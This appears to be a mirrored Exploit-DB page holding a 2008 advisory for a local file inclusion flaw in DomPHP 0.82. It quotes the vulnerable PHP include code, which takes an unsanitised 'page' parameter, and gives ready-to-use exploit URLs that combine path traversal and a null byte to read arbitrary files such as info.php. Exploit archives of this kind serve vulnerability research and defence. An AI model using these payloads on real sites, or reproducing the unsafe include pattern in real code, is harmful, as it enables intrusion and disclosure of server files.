bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/5089.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

30 lines
No EOL
1,011 B
Text
Raw Blame History

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------
= Author : HouSSaMix From H-T Team
= Script : DomPHP 0.82
= Download : http://www.domphp.com/download/
= BUG : Local File Inclusion
= Vulnerable CODE :
~~~~~~~~~ /aides/index.php ~~~~~~~~~~~~~~~~~~~~~~
if (isset($_GET['page'])) {
// On supprime le http:// si tentative de fraude.
$page = str_replace("http://","",$_GET['page']);
include("../aides/".$page.".html");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
= Exploit :
http://Target/[path]/aides/index.php?page=[LFI]%00
= Get phpinfo => http://Target/[path]/info.php
http://Target/[path]/aides/index.php?page=../info.php%00
-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------
# milw0rm.com [2008-02-09]
Reference in a new issue View git blame Copy permalink